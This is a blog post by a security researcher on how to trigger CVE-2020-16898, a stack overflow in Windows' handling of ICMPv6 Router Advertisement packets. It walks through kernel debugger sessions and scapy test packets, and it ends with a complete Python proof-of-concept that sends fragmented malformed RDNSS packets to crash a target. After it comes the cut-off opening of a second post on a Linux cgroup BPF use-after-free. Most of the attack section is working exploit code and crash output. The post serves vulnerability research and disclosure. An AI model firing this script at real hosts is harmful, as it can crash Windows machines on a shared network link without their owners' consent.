During the last Patch Tuesday (13th of October 2020), Microsoft fixed a very interesting (and sexy) vulnerability: CVE-2020-16898 – Windows TCP/IP Remote Code Execution Vulnerability (link). Microsoft’s description of the vulnerability:

“A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client.
To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.”

This vulnerability is so important that I’ve decided to write a Proof-of-Concept for it. During my work there weren’t any public exploits for it. I’ve spent a significant amount of time analyzing all the necessary caveats needed for triggering the bug. Even now, available information doesn’t provide sufficient details for triggering the bug. That’s why I’ve decided to summarize my experience. First, short summary:

This bug can ONLY be exploited when source address is link-local IPv6. This requirement is limiting the potential targets!
The entire payload must be a valid IPv6 packet. If you screw-up headers too much, your packet will be rejected before triggering the bug
During the process of validating the size of the packet, all defined “length” in Optional headers must match the packet size
This vulnerability allows to smuggle an extra “header”. This header is not validated and includes “Length” field. After triggering the bug, this field will be inspected against the packet size anyway.
Windows NDIS API, which can trigger the bug, has a very annoying optimization (from the exploitation perspective). To be able to bypass it, you need to use fragmentation! Otherwise, you can trigger the bug, but it won’t result in memory corruption!

Collecting information about the vulnerability

At first, I wanted to learn more about the bug. The only extra information which I could find were the write-ups provided by the detection logic. This is quite a funny twist of fate that the information on how to protect against attack was helpful in exploitation Write-ups:

The most crucial is the following information:

“While we ignore all Options that aren’t RDNSS, for Option Type = 25 (RDNSS), we check to see if the Length (second byte in the Option) is an even number. If it is, we flag it. If not, we continue. Since the Length is counted in increments of 8 bytes, we multiply the Length by 8 and jump ahead that many bytes to get to the start of the next Option (subtracting 1 to account for the length byte we’ve already consumed).”

OK, what we have learned from it? Quite a lot:

We need to send RDNSS packet
The problem is an even number in the Length field
Function responsible for parsing the packet will reference the last 8 bytes of RDNSS payload as a next header

That’s more than enough to start poking around. First, we need to generate a valid RDNSS packet.

RDNSS

Recursive DNS Server Option (RDNSS) is one of the sub-options for Router Advertisement (RA) message. RA can be sent via ICMPv6. Let’s look at the documentation for RDNSS (https://tools.ietf.org/html/rfc5006):

5.1. Recursive DNS Server Option
The RDNSS option contains one or more IPv6 addresses of recursive DNS
servers. All of the addresses share the same lifetime value. If it
is desirable to have different lifetime values, multiple RDNSS
options can be used. Figure 1 shows the format of the RDNSS option.

  0                   1                   2                   3
  0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |     Type      |     Length    |           Reserved            |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                           Lifetime                            |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                                                               |
 :            Addresses of IPv6 Recursive DNS Servers            :
 |                                                               |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Description of the Length field:

 Length        8-bit unsigned integer.  The length of the option
               (including the Type and Length fields) is in units of
               8 octets.  The minimum value is 3 if one IPv6 address
               is contained in the option.  Every additional RDNSS
               address increases the length by 2.  The Length field
               is used by the receiver to determine the number of
               IPv6 addresses in the option.

This essentially means that Length must always be an odd number as long as there is any payload.
OK, let’s create a RDNSS package. How to do it? I’m using scapy since it’s the easiest and fasted way for creating any packages which we want. It is very simple:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 7
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

When we set-up a kernel debugger and analyze all the public symbols from the tcpip.sys driver we can find interesting function names:

tcpip!Ipv6pHandleRouterAdvertisement
tcpip!Ipv6pUpdateRDNSS

Let’s try to set the breakpoints there and see if our package arrives:

0: kd> bp tcpip!Ipv6pUpdateRDNSS
0: kd> bp tcpip!Ipv6pHandleRouterAdvertisement
0: kd> g
Breakpoint 0 hit
tcpip!Ipv6pHandleRouterAdvertisement:
fffff804`483ba398 48895c2408      mov     qword ptr [rsp+8],rbx
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a66ad8 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement
01 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
02 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
03 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
04 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
05 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
06 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
07 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
08 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
09 fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
0a fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
0b fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
0c fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
0d fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0
0: kd> g
...

Hm… OK. We never hit Ipv6pUpdateRDNSS but we did hit Ipv6pHandleRouterAdvertisement. This means that our package is fine. Why the hell we did not end up in Ipv6pUpdateRDNSS?

Problem 1 – IPv6 link-local address

We are failing validation of the address here:

fffff804`483ba4b4 458a02          mov     r8b,byte ptr [r10]
fffff804`483ba4b7 8d5101          lea     edx,[rcx+1]
fffff804`483ba4ba 8d5902          lea     ebx,[rcx+2]
fffff804`483ba4bd 41b7c0          mov     r15b,0C0h
fffff804`483ba4c0 4180f8ff        cmp     r8b,0FFh
fffff804`483ba4c4 0f84a8820b00    je      tcpip!Ipv6pHandleRouterAdvertisement+0xb83da (fffff804`48472772)
fffff804`483ba4ca 33c0            xor     eax,eax
fffff804`483ba4cc 498bca          mov     rcx,r10
fffff804`483ba4cf 48898570010000  mov     qword ptr [rbp+170h],rax
fffff804`483ba4d6 48898578010000  mov     qword ptr [rbp+178h],rax
fffff804`483ba4dd 4484d2          test    dl,r10b
fffff804`483ba4e0 0f8599820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb83e7 (fffff804`4847277f)
fffff804`483ba4e6 4180f8fe        cmp     r8b,0FEh
fffff804`483ba4ea 0f85ab820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb8403 (fffff804`4847279b) [br=0]

r10 points to the beginning of the address:

0: kd> dq @r10
ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d
ffffcb82`f9a5b04a  000052b0`80db12fd b7220a02`ea3b3a4d
ffffcb82`f9a5b05a  08070800`e56c0086 00000000`00000000
ffffcb82`f9a5b06a  ffffffff`00000719 aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b07a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b08a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b09a  aaaaaaaa`aaaaaaaa 63733a6e`12990c28
ffffcb82`f9a5b0aa  70752d73`616d6568 643a6772`6f2d706e

These bytes:

ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d

are matching my IPv6 address which I’ve used as a source address:

v6_src = "fd12:db80:b052:0:5d7b:5d64:7c08:f5e5"

It is compared with byte 0xFE. By looking here We can learn that:

fe80::/10 — Addresses in the link-local prefix are only valid and unique on a single link (comparable to the auto-configuration addresses 169.254.0.0/16 of IPv4).

OK, so it is looking for the link-local prefix. Another interesting check is when we fail the previous one:

fffff804`4847279b e8f497f8ff      call    tcpip!IN6_IS_ADDR_LOOPBACK (fffff804`483fbf94)
fffff804`484727a0 84c0            test    al,al
fffff804`484727a2 0f85567df4ff    jne     tcpip!Ipv6pHandleRouterAdvertisement+0x166 (fffff804`483ba4fe)
fffff804`484727a8 4180f8fe        cmp     r8b,0FEh
fffff804`484727ac 7515            jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb842b (fffff804`484727c3)

It is checking if we are coming from the LOOPBACK, and next we are validated again for being the link-local. I’ve modified the packet to use link-local address and…

Breakpoint 1 hit
tcpip!Ipv6pUpdateRDNSS:
fffff804`4852a534 4055            push    rbp
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a66728 fffff804`48472cbf tcpip!Ipv6pUpdateRDNSS
01 fffff804`48a66730 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement+0xb8927
02 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
03 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
04 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
05 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
06 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
07 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
08 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
09 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
0a fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
0b fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
0c fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
0d fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
0e fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0

Works! OK, let’s move to the triggering bug phase.

Triggering the bug

What we know from the detection logic write-up:

“we check to see if the Length (second byte in the Option) is an even number”

Let’s test it:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 6
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

and we end up executing this code:

fffff804`4852a5b3 4c8b15be8b0700  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)]
fffff804`4852a5ba e8113bceff      call    fffff804`4820e0d0
fffff804`4852a5bf 418bd7          mov     edx,r15d
fffff804`4852a5c2 498bce          mov     rcx,r14
fffff804`4852a5c5 488bd8          mov     rbx,rax
fffff804`4852a5c8 e8a39de5ff      call    tcpip!NetioAdvanceNetBuffer (fffff804`48384370)
fffff804`4852a5cd 0fb64301        movzx   eax,byte ptr [rbx+1]
fffff804`4852a5d1 8d4e01          lea     ecx,[rsi+1]
fffff804`4852a5d4 2bc6            sub     eax,esi
fffff804`4852a5d6 4183cfff        or      r15d,0FFFFFFFFh
fffff804`4852a5da 99              cdq
fffff804`4852a5db f7f9            idiv    eax,ecx
fffff804`4852a5dd 8b5304          mov     edx,dword ptr [rbx+4]
fffff804`4852a5e0 8945b7          mov     dword ptr [rbp-49h],eax
fffff804`4852a5e3 8bf0            mov     esi,eax
fffff804`4852a5e5 413bd7          cmp     edx,r15d
fffff804`4852a5e8 7412            je      tcpip!Ipv6pUpdateRDNSS+0xc8 (fffff804`4852a5fc)

Essentially, it subtracts 1 from the Length field and the result is divided by 2. This follows the documentation logic and can be summarized as:

tmp = (Length - 1) / 2

This logic generates the same result for the odd and even number:

(8 – 1) / 2 => 3
(7 – 1) / 2 => 3

There is nothing wrong with that by itself. However, this also “defines” how long is the package. Since IPv6 addresses are 16 bytes long, by providing even number, the last 8 bytes of the payload will be used as a beginning of the next header. We can see that in the Wireshark as well:

That’s pretty interesting. However, what to do with that? What next header should we fake? Why this matters at all? Well… it took me some time to figure this out. To be honest, I wrote a simple fuzzer to find it out

Hunting for the correct header(s) (Problem 2)

If we look in the documentation at the available headers / options, we don’t really know which one to use (https://www.iana.org/assignments/icmpv6-parameters/icmpv6-parameters.xml):

What we do know is that ICMPv6 messages have the following general format:

       0                   1                   2                   3
       0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |     Type      |     Code      |          Checksum             |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                                                               |
      +                         Message Body                          +
      |                                                               |

First byte is encoding “type” of the package. I’ve made the test and I’ve generated next header to be exactly the same as the “buggy” RDNSS one. I’ve been hitting breakpoint for tcpip!Ipv6pUpdateRDNSS but tcpip!Ipv6pHandleRouterAdvertisement was hit only once. I’ve run my IDA Pro and started to analyze what’s going on and what logic is being executed. After some reverse engineering I realized that we have 2 loops in the code:

First loop goes through all the headers and does some basic validation (size of length etc)
Second loop doesn’t do any more validation but parses the package.

As soon as there are more ‘optional headers’ in the buffer, we are in the loop. That’s a very good primitive! Anyway, I still don’t know what headers should be used and to find it out I had been brute-forcing all the ‘optional header’ types in the triggered bug and found out that second loop cares only about:

Type 3 (Prefix Information)
Type 24 (Route Information)
Type 25 (RDNSS)
Type 31 (DNS Search List Option)

I’ve analyzed Type 24 logic since it was much “smaller / shorter” than Type 3.

Stack overflow

OK. Let’s try to generate the malicious RDNSS packet “faking” Route Information as a next one:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 6
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:03AA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

This never hits tcpip!Ipv6pUpdateRDNSS function.

Problem 3 – size of the package.

After debugging I’ve realized that we are failing in the following check:

fffff804`483ba766 418b4618        mov     eax,dword ptr [r14+18h]
fffff804`483ba76a 413bc7          cmp     eax,r15d
fffff804`483ba76d 0f85d0810b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb85ab (fffff804`48472943)

where eax is the size of the package and r15 keeps an information of how much data were consumed. In that specific case we have:

rax = 0x48
r15 = 0x40

This is exactly 8 bytes difference because we use an even number. To bypass it, I’ve placed another header just after the last one. However, I was still hitting the same problem It took me some time to figure out how to play with the packet layout to bypass it. I’ve finally managed to do so.

Problem 4 – size again!

Finally, I’ve found the correct packet layout and I could end up in the code responsible for handling Route Information header. However, I did not Here is why. After returning from the RDNSS I ended up here:

fffff804`48472cba e875780b00      call    tcpip!Ipv6pUpdateRDNSS (fffff804`4852a534)
fffff804`48472cbf 440fb77c2462    movzx   r15d,word ptr [rsp+62h]
fffff804`48472cc5 e9c980f4ff      jmp     tcpip!Ipv6pHandleRouterAdvertisement+0x9fb (fffff804`483bad93)
...
fffff804`483bad15 4c8b155c841e00  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0
fffff804`483bad1c e8af33e5ff      call    fffff804`4820e0d0
...
fffff804`483bad15 4c8b155c841e00  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)]
fffff804`483bad1c e8af33e5ff      call    fffff804`4820e0d0
fffff804`483bad21 0fb64801        movzx   ecx,byte ptr [rax+1]
fffff804`483bad25 66c1e103        shl     cx,3
fffff804`483bad29 66894c2462      mov     word ptr [rsp+62h],cx
fffff804`483bad2e 6685c9          test    cx,cx
fffff804`483bad31 0f8485060000    je      tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc)
fffff804`483bad37 0fb7c9          movzx   ecx,cx
fffff804`483bad3a 413b4e18        cmp     ecx,dword ptr [r14+18h] ds:002b:ffffcb82`fcbed1c8=000000b8
fffff804`483bad3e 0f8778060000    ja      tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc)

ecx keeps the information about the “Length” of the “fake header”. However, [r14+18h] points to the size of the data left in the package. I set Length to the max (0xFF) which is multiplied by 8 (2040 == 0x7f8). However, there is only “0xb8” bytes left. So, I’ve failed another size validation!

To be able to fix it, I’ve decreased the size of the “fake header” and at the same time attached more data to the package. That worked!

Problem 5 – NdisGetDataBuffer() and fragmentation

I’ve finally found all the puzzles to be able to trigger the bug. I thought so… I ended up executing the following code responsible for handling Route Information message:

fffff804`48472cd9 33c0            xor     eax,eax
fffff804`48472cdb 44897c2420      mov     dword ptr [rsp+20h],r15d
fffff804`48472ce0 440fb77c2462    movzx   r15d,word ptr [rsp+62h]
fffff804`48472ce6 4c8d85b8010000  lea     r8,[rbp+1B8h]
fffff804`48472ced 418bd7          mov     edx,r15d
fffff804`48472cf0 488985b8010000  mov     qword ptr [rbp+1B8h],rax
fffff804`48472cf7 448bcf          mov     r9d,edi
fffff804`48472cfa 488985c0010000  mov     qword ptr [rbp+1C0h],rax
fffff804`48472d01 498bce          mov     rcx,r14
fffff804`48472d04 488985c8010000  mov     qword ptr [rbp+1C8h],rax
fffff804`48472d0b 48898580010000  mov     qword ptr [rbp+180h],rax
fffff804`48472d12 48898588010000  mov     qword ptr [rbp+188h],rax
fffff804`48472d19 4c8b1558041300  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0

It tries to get the “Length” bytes from the packet to read the entire header. However, Length is fake and not validated. In my test case it has value “0x100”. Destination address is pointing to the stack which represents Route Information header. It is a very small buffer. So, we should have classic stack overflow, but inside of the NdisGetDataBuffer function I ended-up executing this:

fffff804`4820e10c 8b7910          mov     edi,dword ptr [rcx+10h]
fffff804`4820e10f 8b4328          mov     eax,dword ptr [rbx+28h]
fffff804`4820e112 8bf2            mov     esi,edx
fffff804`4820e114 488d0c3e        lea     rcx,[rsi+rdi]
fffff804`4820e118 483bc8          cmp     rcx,rax
fffff804`4820e11b 773e            ja      fffff804`4820e15b
fffff804`4820e11d f6430a05        test    byte ptr [rbx+0Ah],5 ds:002b:ffffcb83`086a4c7a=0c
fffff804`4820e121 0f84813f0400    je      fffff804`482520a8
fffff804`4820e127 488b4318        mov     rax,qword ptr [rbx+18h]
fffff804`4820e12b 4885c0          test    rax,rax
fffff804`4820e12e 742b            je      fffff804`4820e15b
fffff804`4820e130 8b4c2470        mov     ecx,dword ptr [rsp+70h]
fffff804`4820e134 8d55ff          lea     edx,[rbp-1]
fffff804`4820e137 4803c7          add     rax,rdi
fffff804`4820e13a 4823d0          and     rdx,rax
fffff804`4820e13d 483bd1          cmp     rdx,rcx
fffff804`4820e140 7519            jne     fffff804`4820e15b
fffff804`4820e142 488b5c2450      mov     rbx,qword ptr [rsp+50h]
fffff804`4820e147 488b6c2458      mov     rbp,qword ptr [rsp+58h]
fffff804`4820e14c 488b742460      mov     rsi,qword ptr [rsp+60h]
fffff804`4820e151 4883c430        add     rsp,30h
fffff804`4820e155 415f            pop     r15
fffff804`4820e157 415e            pop     r14
fffff804`4820e159 5f              pop     rdi
fffff804`4820e15a c3              ret
fffff804`4820e15b 4d85f6          test    r14,r14

In the first ‘cmp‘ instruction, rcx register keeps the value of the requested size. Rax register keeps some huge number, and because of that I could never jump out from that logic. As a result of that call, I had been getting a different address than local stack address and none of the overflow happens. I didn’t know what was going on… So, I started to read the documentation of this function and here is the magic:

“If the requested data in the buffer is contiguous, the return value is a pointer to a location that NDIS provides. If the data is not contiguous, NDIS uses the Storage parameter as follows:
If the Storage parameter is non-NULL, NDIS copies the data to the buffer at Storage. The return value is the pointer passed to the Storage parameter.
If the Storage parameter is NULL, the return value is NULL.”

Here we go… Our big package is kept somewhere in NDIS and pointer to that data is returned instead of copying it to the local buffer on the stack. I started to Google if anyone was already hitting that problem and… of course yes Looking at this link:

http://newsoft-tech.blogspot.com/2010/02/

we can learn that the simplest solution is to fragment the package. This is exactly what I’ve done and….

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x00000139
                       (0x0000000000000002,0xFFFFF80448A662E0,0xFFFFF80448A66238,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff804`45bca210 cc              int     3
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a65818 fffff804`45ca9922 nt!DbgBreakPointWithStatus
01 fffff804`48a65820 fffff804`45ca9017 nt!KiBugCheckDebugBreak+0x12
02 fffff804`48a65880 fffff804`45bc24c7 nt!KeBugCheck2+0x947
03 fffff804`48a65f80 fffff804`45bd41e9 nt!KeBugCheckEx+0x107
04 fffff804`48a65fc0 fffff804`45bd4610 nt!KiBugCheckDispatch+0x69
05 fffff804`48a66100 fffff804`45bd29a3 nt!KiFastFailDispatch+0xd0
06 fffff804`48a662e0 fffff804`4844ac25 nt!KiRaiseSecurityCheckFailure+0x323
07 fffff804`48a66478 fffff804`483bb487 tcpip!_report_gsfailure+0x5
08 fffff804`48a66480 aaaaaaaa`aaaaaaaa tcpip!Ipv6pHandleRouterAdvertisement+0x10ef
09 fffff804`48a66830 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0a fffff804`48a66838 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0b fffff804`48a66840 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0c fffff804`48a66848 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0d fffff804`48a66850 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0e fffff804`48a66858 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0f fffff804`48a66860 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
10 fffff804`48a66868 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
11 fffff804`48a66870 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
12 fffff804`48a66878 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
13 fffff804`48a66880 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
14 fffff804`48a66888 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
...

Here we go!

Proof-of-Concept

Code can be found here:

http://site.pi3.com.pl/exp/p_CVE-2020-16898.py

#!/usr/bin/env python3
#
# Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
#
# Author: Adam 'pi3' Zabrocki
# http://pi3.com.pl
#

from scapy.all import *

v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA();

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
              IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
    send(p)

Thanks,
Adam

pi3 blog
CVE: 2020-14356 & 2020-25220pi3
11 September 2020 at 05:35

CVE: 2020-14356 & 2020-25220

pi3 blog

By: pi3

11 September 2020 at 05:35

The short story of 1 Linux Kernel Use-After-Free bug and 2 CVEs (CVE-2020-14356 and CVE-2020-25220)

Name:     Linux kernel Cgroup BPF Use-After-Free
Author:   Adam Zabrocki ([email protected])
Date:       May 27, 2020

First things first – short history:

In 2019 Tejun Heo discovered a racing problem with lifetime of the cgroup_bpf which could result in double-free and other memory corruptions. This bug was fixed in kernel 5.3. More information about the problem and the patch can be found here:

https://lore.kernel.org/patchwork/patch/1094080/

Roman Gushchin discovered another problem with the newly fixed code which could lead to use-after-free vulnerability. His report and fix can be found here:

https://lore.kernel.org/bpf/[email protected]/

During the discussion on the fix, Alexei Starovoitov pointed out that walking through the cgroup hierarchy without holding cgroup_mutex might be dangerous:

https://lore.kernel.org/bpf/20200104003523.rfte5rw6hbnncjes@ast-mbp/

However, Roman and Alexei concluded that it shouldn’t be a problem:

https://lore.kernel.org/bpf/20200106220746.fm3hp3zynaiaqgly@ast-mbp/

Unfortunately, there is another Use-After-Free bug related to the Cgroup BPF release logic.

The “new” bug – details (a lot of details ;-)):

During LKRG development and tests, one of my VMs was generating a kernel crash during shutdown procedure. This specific machine had the newest kernel at that time (5.7.x) and I compiled it with all debug information as well as SLAB DEBUG feature. When I analyzed the crash, it had nothing to do with LKRG. Later I confirmed that kernels without LKRG are always hitting that issue:

      KERNEL: linux-5.7/vmlinux
    DUMPFILE: /var/crash/202006161848/dump.202006161848  [PARTIAL DUMP]
        CPUS: 1
        DATE: Tue Jun 16 18:47:40 2020
      UPTIME: 14:09:24
LOAD AVERAGE: 0.21, 0.37, 0.50
       TASKS: 234
    NODENAME: oi3
     RELEASE: 5.7.0-g4
     VERSION: #28 SMP PREEMPT Fri Jun 12 18:09:14 UTC 2020
     MACHINE: x86_64  (3694 Mhz)
      MEMORY: 8 GB
       PANIC: "Oops: 0000 [#1] PREEMPT SMP PTI" (check log for details)
         PID: 1060499
     COMMAND: "sshd"
        TASK: ffff9d8c36b33040  [THREAD_INFO: ffff9d8c36b33040]
         CPU: 0
       STATE:  (PANIC)

crash> bt
PID: 1060499  TASK: ffff9d8c36b33040  CPU: 0   COMMAND: "sshd"
 #0 [ffffb0fc41b1f990] machine_kexec at ffffffff9404d22f
 #1 [ffffb0fc41b1f9d8] __crash_kexec at ffffffff941c19b8
 #2 [ffffb0fc41b1faa0] crash_kexec at ffffffff941c2b60
 #3 [ffffb0fc41b1fab0] oops_end at ffffffff94019d3e
 #4 [ffffb0fc41b1fad0] page_fault at ffffffff95c0104f
    [exception RIP: __cgroup_bpf_run_filter_skb+401]
    RIP: ffffffff9423e801  RSP: ffffb0fc41b1fb88  RFLAGS: 00010246
    RAX: 0000000000000000  RBX: ffff9d8d56ae1ee0  RCX: 0000000000000028
    RDX: 0000000000000000  RSI: ffff9d8e25c40b00  RDI: ffffffff9423e7f3
    RBP: 0000000000000000   R8: 0000000000000000   R9: 0000000000000000
    R10: 0000000000000003  R11: 0000000000000000  R12: 0000000000000000
    R13: 0000000000000000  R14: 0000000000000000  R15: 0000000000000001
    ORIG_RAX: ffffffffffffffff  CS: 0010  SS: 0018
 #5 [ffffb0fc41b1fbd0] ip_finish_output at ffffffff957d71b3
 #6 [ffffb0fc41b1fbf8] __ip_queue_xmit at ffffffff957d84e1
 #7 [ffffb0fc41b1fc50] __tcp_transmit_skb at ffffffff957f4b27
 #8 [ffffb0fc41b1fd58] tcp_write_xmit at ffffffff957f6579
 #9 [ffffb0fc41b1fdb8] __tcp_push_pending_frames at ffffffff957f737d
#10 [ffffb0fc41b1fdd0] tcp_close at ffffffff957e6ec1
#11 [ffffb0fc41b1fdf8] inet_release at ffffffff9581809f
#12 [ffffb0fc41b1fe10] __sock_release at ffffffff95616848
#13 [ffffb0fc41b1fe30] sock_close at ffffffff956168bc
#14 [ffffb0fc41b1fe38] __fput at ffffffff942fd3cd
#15 [ffffb0fc41b1fe78] task_work_run at ffffffff94148a4a
#16 [ffffb0fc41b1fe98] do_exit at ffffffff9412b144
